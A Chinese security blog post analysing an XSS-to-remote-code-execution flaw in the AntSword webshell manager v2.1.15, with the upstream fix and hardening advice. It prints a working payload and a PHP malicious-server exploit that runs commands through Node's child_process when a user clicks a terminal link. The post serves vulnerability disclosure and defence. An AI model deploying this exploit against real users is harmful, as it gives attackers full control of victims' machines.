文章总结: AntSwordv2.1.15被曝高危XSS转RCE漏洞,攻击者可通过恶意服务端响应注入脚本实现任意代码执行。漏洞源于noxss()过滤不完整,未转义方括号等字符导致jquery.terminal格式码被解析。官方已发布v2.1.16修复版本,建议用户立即升级并避免点击虚拟终端中的可疑链接。 综合评分: 85 文章分类: 漏洞分析,渗透测试,WEB安全,安全工具,应急响应
紧急!蚁剑 v2.1.15 曝致命漏洞。网友:玩一辈子鹰,被鹰啄瞎了眼
原创
hacking hacking
Hacking黑白红
2026年4月28日 16:53 安徽
在小说阅读器读本章
去阅读
2026年4月28日,安全圈曝出重磅预警——AntSword(中国蚁剑)v2.1.15 被发现高危漏洞。
该漏洞早在4月24日,安全研究员 s2cr3t 在 AntSword 官方 GitHub 仓库就提交了一个高危漏洞报告(Issue #370)。
攻击者可构造恶意服务端响应,实现 XSS 注入直接转为远程代码执行(RCE),用户只需轻点一下,本机就会被完全控制。
先看什么是蚁剑?
AntSword(中国蚁剑) 是一款开源跨平台的网站管理与渗透测试工具,基于 Electron 开发,广泛用于Webshell 管理、文件操作、数据库管理、虚拟终端等场景,是安全从业者、渗透测试人员常用的辅助工具,支持 PHP/ASP/ASPX/JSP 等多种脚本环境。
但也正因高权限、高频使用,一旦工具自身出现漏洞,极易被黑产利用,反噬使用者本地主机。
一、漏洞核心信息
- 漏洞来源:GitHub Issues #370
- 影响版本:AntSword v2.1.15
- 漏洞类型:XSS → RCE 任意代码执行
- 利用难度:极低,点击即触发
- 危害等级:高危
二、漏洞原理
漏洞根源在于 antSword.noxss() 过滤不完整,仅对 5 个基础字符做转义,未覆盖 [ ] ! ; : 等 jquery.terminal 格式码字符。 恶意服务端可注入构造好的脚本链接,绕过过滤后在虚拟终端渲染为可点击链接。
由于蚁剑基于 Electron 开发,且开启了 nodeIntegration: true ,一旦点击链接,可直接调用 Node.js API,执行任意系统命令,完全接管用户主机。
三、攻击流程
攻击者部署恶意服务端,注入含 javascript: 协议的 Payload
攻击流程(极简复现)
恶意 PHP 服务端构造 Payload:
[[!;;;;javascript:void(require(`child_process`).exec(`calc.exe`))]{http://localhost/phpmyadmin/}]
蚁剑连接该服务端,打开虚拟终端执行任意命令;
命令输出出现 “正常链接”,用户点击后本地弹出计算器,可进一步执行任意恶意代码。
Exp:
<?php$pass = 'test';if (!isset($_POST[$pass])) { http_response_code(404); exit;}$code = $_POST[$pass];if (!function_exists('get_magic_quotes_gpc')) { function get_magic_quotes_gpc() { return 0; }}$payload = '[[!;;;;javascript:void(require(`child_process`).exec(`calc`))]{Click here for phpMyAdmin}]';$b64payload = base64_encode("\n" . $payload);$inject = 'echo base64_decode("' . $b64payload . '");';// 只在终端命令请求时注入 (包含 system/exec/passthru/popen 等命令执行函数)if (preg_match('/\bsystem\b|\bexec\b|\bpassthru\b|\bpopen\b|\bshell_exec\b|\bproc_open\b/', $code)) { $code = str_replace('asoutput();', $inject . 'asoutput();', $code);}@eval($code);?>
四、官方修复方案
1. 首选方案:立即升级到 v2.1.16 2. 临时加固:扩展 noxss() 过滤规则,转义 [ 字符
最小改动(推荐)
扩展noxss()过滤字符集,转义[,阻断格式码解析:
noxss: (html = '', wrap = true) => { let _html = String(html) .replace(/&/g, "&") .replace(/'/g, "'") .replace(/>/g, ">") .replace(/</g, "<") .replace(/"/g, """) .replace(/\[/g, "["); // 新增:阻断格式码 if (wrap) { _html = _html.replace(/\n/g, '<br/>'); } return _html;}
3. 限制协议:仅放行 http/https,禁止 javascript:
4. 根治方案:关闭 nodeIntegration ,使用 contextBridge 安全隔离
五、安全建议
1. 立即停止使用 v2.1.15,升级到最新版 v2.1.16 2. 不连接不明、不可信的服务端 3. 虚拟终端内陌生链接一律不点击 4. 高频使用者按官方方案加固环境,降低权限风险
渗透工具是一把双刃剑,自身安全直接决定使用者风险。请所有蚁剑用户尽快自查更新,避免被反向控制!
作者:hacking。前北漂程序员,现在做安全。
文章数据来自网络,大模型优化,侵权删。
往期相关回顾
突发!意大利批准:美国引渡中国工程师徐泽伟
度假变噩梦!徐泽伟因美国网络入侵指控在意大利被扣,妻子:老人孩子还能等多久?
被指控网络入侵:中国徐泽伟在意大利被扣押的210天、或被引渡美国
徐泽伟引渡美国!意大利上诉被驳回,被美国指控黑客入侵
朝鲜黑客封神!潜伏6个月盗走2.85亿,DeFi史上最精密猎杀案曝光
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Hacking黑白红 hacking hacking《紧急!蚁剑 v2.1.15 曝致命漏洞。网友:玩一辈子鹰,被鹰啄瞎了眼》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论